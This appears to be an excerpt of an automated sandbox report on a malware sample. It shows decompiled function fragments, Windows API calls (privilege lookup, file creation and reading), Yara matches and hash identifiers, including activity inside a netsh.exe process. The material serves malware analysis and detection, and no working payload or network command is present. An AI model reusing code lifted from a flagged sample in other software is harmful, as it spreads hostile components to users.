                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                0x0041a1ea
                                                0x0041a200
                                                0x0041a204

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                Memory Dump Source
                                                • Source File: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A0B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                0x0041a0b3
                                                0x0041a0ca
                                                0x0041a0d8

                                                APIs
                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                                Memory Dump Source
                                                • Source File: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C3967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e3ee69f173153a169f04833ffd44c6c47909b8e73f3f5edccd5207ff167b48e8
                                                • Instruction ID: fda504bd509cc17b58df65cdaf4d62f4ef5a2c616e90cc6d39529559f316e41a
                                                • Opcode Fuzzy Hash: e3ee69f173153a169f04833ffd44c6c47909b8e73f3f5edccd5207ff167b48e8
                                                • Instruction Fuzzy Hash: 44B09BB19064C5C5DB51E76046087177A14B7D0741F26C061E1130681A4778C591F5B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 004172F0, Relevance: .0, Instructions: 11COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b2c359d43c41f8124d3e3d0b8af42d6c08adbe7f1f3f6c642d998c40f5ee991
                                                • Instruction ID: 740181601489bf939361c221166955c064686c9a939c061dbf57760c78d350e6
                                                • Opcode Fuzzy Hash: 5b2c359d43c41f8124d3e3d0b8af42d6c08adbe7f1f3f6c642d998c40f5ee991
                                                • Instruction Fuzzy Hash: 50A00117F450184554255C8A7C421B8F3A4D587076D5433A7DE0CB35011402C429059D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C398A0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe219c6ca75403de960479388c8609e84cd27647ec7d764cd6249b6e5714b654
                                                • Instruction ID: fafcc02c29837a354ae93f34450fa1ee51816f6941f9de1b090018e03ffc7dea
                                                • Opcode Fuzzy Hash: fe219c6ca75403de960479388c8609e84cd27647ec7d764cd6249b6e5714b654
                                                • Instruction Fuzzy Hash: 049002A130100502D602715944546060109E7D1385FA1C022E1424595D86658953F172
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C3B040, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3c1df27245542fb1534cec522d679fcbba327431626bbe8686bfb9252a06689
                                                • Instruction ID: 19b25ef4b7d18ddadd4896db0ce186dfa82bb808ffe033ddf024e97217663aee
                                                • Opcode Fuzzy Hash: a3c1df27245542fb1534cec522d679fcbba327431626bbe8686bfb9252a06689
                                                • Instruction Fuzzy Hash: AE9002E1701141434A40B15948444065115B7E13413A1C131A04545A0C86A88855E2A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39820, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 326c2d15d3f1a4fbdf2d9076a7c4da07487fd8154011a8c42d1a1a2842c15e96
                                                • Instruction ID: 6274ff0ecee80465016df2084712e36c333986d7c1aba54a94d904bacc000ae6
                                                • Opcode Fuzzy Hash: 326c2d15d3f1a4fbdf2d9076a7c4da07487fd8154011a8c42d1a1a2842c15e96
                                                • Instruction Fuzzy Hash: 469002B134100502D641715944446060109B7D0381FA1C022A0424594E86958A56FAA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C399D0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 38d5ce4427e38d362dcce80b525f4396d3f1172683f068699be20e1476542ef0
                                                • Instruction ID: 43829d3494d9da9cde2564f4d64a8315b033b768ecfce413f4bbbe838ae110d7
                                                • Opcode Fuzzy Hash: 38d5ce4427e38d362dcce80b525f4396d3f1172683f068699be20e1476542ef0
                                                • Instruction Fuzzy Hash: EF9002E131100142D604715944447060145A7E1341F61C022A2154594CC5698C61A165
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39950, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e06b6a6b963a95e374b7689bb2057952080e9306b932539dfcab125eefe0e9eb
                                                • Instruction ID: 87aac8b69f4eaef9744e1ed641e4ff7514760f354c7e54ebf706fdc8045444d8
                                                • Opcode Fuzzy Hash: e06b6a6b963a95e374b7689bb2057952080e9306b932539dfcab125eefe0e9eb
                                                • Instruction Fuzzy Hash: 069002E130140503D640755948446070105A7D0342F61C021A2064595E8A698C51B175
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39A80, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f6a27a53d8e68e5bd12b5539c155843766b01a93a670574d88877670e6b16a6
                                                • Instruction ID: a74db42afe72dd03ce2b6f4c9c1df40a9faa0f9f801bd7cf345f36d799d27ace
                                                • Opcode Fuzzy Hash: 2f6a27a53d8e68e5bd12b5539c155843766b01a93a670574d88877670e6b16a6
                                                • Instruction Fuzzy Hash: 839002A130144542D64072594844B0F4205A7E1342FA1C029A4156594CC9558855A761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39A10, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ec723856245ca0e04692704fdb8ea270958d9472632ea87e1ea79d5fbaf040aa
                                                • Instruction ID: 5becb09e281cd543135b508e0b0f9a1ba17ee3e00f32fc6e7ce43314f733d13f
                                                • Opcode Fuzzy Hash: ec723856245ca0e04692704fdb8ea270958d9472632ea87e1ea79d5fbaf040aa
                                                • Instruction Fuzzy Hash: 889002B130140502D600715948487470105A7D0342F61C021A5164595E86A5C891B571
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C3A3B0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cfed6bc7767e7b0a764d6244ae18e476d37d6006b4c21947d06ca3a9fbd949af
                                                • Instruction ID: 05661c681ed30b56bc4bd505378f8a4e411c470e887d847f34f87a8731376a6a
                                                • Opcode Fuzzy Hash: cfed6bc7767e7b0a764d6244ae18e476d37d6006b4c21947d06ca3a9fbd949af
                                                • Instruction Fuzzy Hash: CA9002B130144102D6407159848460B5105B7E0341F61C421E0425594C86558856E261
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39B00, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7b44ebd544770bc8c182170de50970542ad231eb244a557d52024d9be29048f4
                                                • Instruction ID: 41b01186038916b28a200da67afd9f333c1466269ac51f03d503bb8e091aec3a
                                                • Opcode Fuzzy Hash: 7b44ebd544770bc8c182170de50970542ad231eb244a557d52024d9be29048f4
                                                • Instruction Fuzzy Hash: 599002A134100902D640715984547070106E7D0741F61C021A0024594D86568965B6F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C395F0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 426b8f0cfcdc99ce8fc0236e6f739dd0683a2323ce9d8e3dffd87299a5bcf391
                                                • Instruction ID: 9d2517ef30c42b39b4543114849c695f3f4e98028b8a16ca882f126dd547154f
                                                • Opcode Fuzzy Hash: 426b8f0cfcdc99ce8fc0236e6f739dd0683a2323ce9d8e3dffd87299a5bcf391
                                                • Instruction Fuzzy Hash: 8D9002B130100902D604715948446860105A7D0341F61C021A6024695E96A58891B171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39560, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 84755882b4df593082905f40a782604322a2572982f91c20e14dc76e17dd36de
                                                • Instruction ID: 472d8c0ab92677ce945344652d4b7f5962f85b7500c8bcf9d42f745a89f7287e
                                                • Opcode Fuzzy Hash: 84755882b4df593082905f40a782604322a2572982f91c20e14dc76e17dd36de
                                                • Instruction Fuzzy Hash: E59002A5321001020645B559064450B0545B7D63913A1C025F14165D0CC6618865A361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39520, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ecbc67dbcf651bc8086cd665b77789fc4cf659b6bf286225c9250f84672eab6
                                                • Instruction ID: c910bd3300026d29277ea5a23d5b5a9a7b10bb965709718e498ccc7659d1dcec
                                                • Opcode Fuzzy Hash: 6ecbc67dbcf651bc8086cd665b77789fc4cf659b6bf286225c9250f84672eab6
                                                • Instruction Fuzzy Hash: B69002E1301141924A00B2598444B0A4605A7E0341B61C026E10545A0CC5658851E175
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C3AD30, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aeba6ff37f87cc50bea206c43bf7f012673291883309ce038c834340c6c4b210
                                                • Instruction ID: dcf760a721c1672a446348c2bae7271fc6c00917abc24bd6cd7604c1db7b8a35
                                                • Opcode Fuzzy Hash: aeba6ff37f87cc50bea206c43bf7f012673291883309ce038c834340c6c4b210
                                                • Instruction Fuzzy Hash: 279002B1B05001129640715948546464106B7E0781B65C021A0514594C89948A55A3E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C396D0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4ff483a8d993f42713e04cea9e6d0f3401f93a832b683277458cc5e89dbfb77c
                                                • Instruction ID: fb1180142135bd4bb187e9ac974acfaca0aa1f85b8f063d406d3214de2b84c02
                                                • Opcode Fuzzy Hash: 4ff483a8d993f42713e04cea9e6d0f3401f93a832b683277458cc5e89dbfb77c
                                                • Instruction Fuzzy Hash: BF9002B130100942D60071594444B460105A7E0341F61C026A0124694D8655C851B561
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39650, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8de6aa494b5bf17460abc625500229b177164b97c00e0f5fb6a48b623f5aa753
                                                • Instruction ID: 2962d3e86d8f66217b20d1cb2fade86d5ea431fa63e4538bf79c1fdf1e51badd
                                                • Opcode Fuzzy Hash: 8de6aa494b5bf17460abc625500229b177164b97c00e0f5fb6a48b623f5aa753
                                                • Instruction Fuzzy Hash: 3F9002B130504942D64071594444A460115A7D0345F61C021A00646D4D96658D55F6A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39610, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 35dbb65a230f94af87639ac8c0b327821e32da0f086446f978d903d61d220769
                                                • Instruction ID: 91f8254c976049afe1a9ac726c209d4dada09edbf97baa5cc93e48354d72b25a
                                                • Opcode Fuzzy Hash: 35dbb65a230f94af87639ac8c0b327821e32da0f086446f978d903d61d220769
                                                • Instruction Fuzzy Hash: 4D9002B170500902D650715944547460105A7D0341F61C021A0024694D87958A55B6E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39FE0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d6e379ff4305647e1e55410508da992719d2bc774b927247fbfa9ccd608e62df
                                                • Instruction ID: 7a1ef3d96bbb1363c3ae4691cc432f75c086aa2c09db0367eab82c5fe247124c
                                                • Opcode Fuzzy Hash: d6e379ff4305647e1e55410508da992719d2bc774b927247fbfa9ccd608e62df
                                                • Instruction Fuzzy Hash: 1D9002B131114502D610715984447060105A7D1341F61C421A0824598D86D58891B162
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39760, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ed77ca3031288489f8d07976cd1e3c2ddfb2cca07e57c1dd4f9e3665d5c03bd1
                                                • Instruction ID: a27730c2e94568b1113c36d415b0fad8b0c1fc7db752a4fd1f60ec093440362f
                                                • Opcode Fuzzy Hash: ed77ca3031288489f8d07976cd1e3c2ddfb2cca07e57c1dd4f9e3665d5c03bd1
                                                • Instruction Fuzzy Hash: 959002B130100503D600715955487070105A7D0341F61D421A0424598DD6968851B161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39770, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1d65cf9dfc99206b0848ef69bdd031c29c69f2216b1693b76edcc48c1c85b80b
                                                • Instruction ID: ebb59276aed75d911498d01295d6e74fe163e94d9e949f45103b417227a61823
                                                • Opcode Fuzzy Hash: 1d65cf9dfc99206b0848ef69bdd031c29c69f2216b1693b76edcc48c1c85b80b
                                                • Instruction Fuzzy Hash: 4A9002A130504542D60075595448A060105A7D0345F61D021A10645D5DC6758851F171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C3A770, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 204b8ea34cc849a5990bb098de69d0605edfbb161d2b2e5a3c8d4c0a92f4dd39
                                                • Instruction ID: 9830fca83ec846d090327cafb8461243da15a7dbeffed7b6c5caba0cedf26dc2
                                                • Opcode Fuzzy Hash: 204b8ea34cc849a5990bb098de69d0605edfbb161d2b2e5a3c8d4c0a92f4dd39
                                                • Instruction Fuzzy Hash: BD9002B530504542DA0075595844A870105A7D0345F61D421A04245DCD86948861F161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C3A710, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 173f5388174476487e9bc20faa6342fec40950017940adea7f8c4bfc3d9c7557
                                                • Instruction ID: 1c8e78cd6be4933ac93560e99d79cef86e91229b399c57ef04d38e1d60ffcc36
                                                • Opcode Fuzzy Hash: 173f5388174476487e9bc20faa6342fec40950017940adea7f8c4bfc3d9c7557
                                                • Instruction Fuzzy Hash: CF9002B1301001529A00B6995844A4A4205A7F0341B61D025A4014594C85948861A161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39730, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6afa25e42b821bca69e7c725845d1230dd38fc91f32ae1b3dd328f7d8ba47a58
                                                • Instruction ID: b523811cbac1d2046bf8342a00ecec8d3f7644039d08ae12e87f3a40e9c378e3
                                                • Opcode Fuzzy Hash: 6afa25e42b821bca69e7c725845d1230dd38fc91f32ae1b3dd328f7d8ba47a58
                                                • Instruction Fuzzy Hash: 6A9002A170500502D640715954587060115A7D0341F61D021A0024594DC6998A55B6E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39670, Relevance: .0, Instructions: 2COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: 51603cd83192b3a82d3ee157a94f8498ae93fe4e54712616f9e139894b99c55a
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C8FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 53%
                                                			E00C8FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00C3CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00C85720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00C85720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                0x00c8fdda
                                                0x00c8fde2
                                                0x00c8fde5
                                                0x00c8fdec
                                                0x00c8fdfa
                                                0x00c8fdff
                                                0x00c8fe0a
                                                0x00c8fe0f
                                                0x00c8fe17
                                                0x00c8fe1e
                                                0x00c8fe19
                                                0x00c8fe19
                                                0x00c8fe19
                                                0x00c8fe20
                                                0x00c8fe21
                                                0x00c8fe22
                                                0x00c8fe25
                                                0x00c8fe40

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C8FDFA
                                                Strings
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00C8FE01
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00C8FE2B
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                • API String ID: 885266447-3903918235
                                                • Opcode ID: 4fb74aa4f9238f750294da36298d681f6273c3e168e1dfda42dc6c2a46202a70
                                                • Instruction ID: 022398caf5fcfc3681288e6226737ea527d1414b75c41eab65228f0f089864aa
                                                • Opcode Fuzzy Hash: 4fb74aa4f9238f750294da36298d681f6273c3e168e1dfda42dc6c2a46202a70
                                                • Instruction Fuzzy Hash: 96F0F632200641BFD6242A56DC02F23BB5AEB44730F244319F628561E1DBA2F86097F4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: netsh.exe PID: 6916 Parent PID: 3472 netsh.exeCOMMON

                                                Executed Functions

                                                Function 02BB9D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,02BB4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02BB4B87,007A002E,00000000,00000060,00000000,00000000), ref: 02BB9DAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction ID: 18b7e3c54ed978f0007774fd37b9d7e795f66ae4db63f642503b0d6133d3c62c
                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction Fuzzy Hash: BCF0B2B2200208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02BB9DB3, Relevance: 1.6, APIs: 1, Instructions: 82filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(02BB4D42,5EB6522D,FFFFFFFF,02BB4A01,?,?,02BB4D42,?,02BB4A01,FFFFFFFF,5EB6522D,02BB4D42,?,00000000), ref: 02BB9E55
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: c9fe3cb5746154e00976b420beeb99fa5d73d9be8d8d481014db7f636c3b6ccd
                                                • Instruction ID: ea39133f3c079f3bc001f02984c42976d47a20f3d3143b2acae4a1c8e43a73b0
                                                • Opcode Fuzzy Hash: c9fe3cb5746154e00976b420beeb99fa5d73d9be8d8d481014db7f636c3b6ccd
                                                • Instruction Fuzzy Hash: AA2109B5200108AFDB18DF99DC85EEB77A9EF8C754F158288FA4DA7241C630E811CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02BB9E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(02BB4D42,5EB6522D,FFFFFFFF,02BB4A01,?,?,02BB4D42,?,02BB4A01,FFFFFFFF,5EB6522D,02BB4D42,?,00000000), ref: 02BB9E55
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction ID: 81af65f4ef8fc507d8632fe7765474f9623a098c2b449cfb8005a5e1909ffe47
                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction Fuzzy Hash: D8F0A4B2200208ABDB14DF89DC80EEB77ADEF8C754F158248BA5DA7241D630E8118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

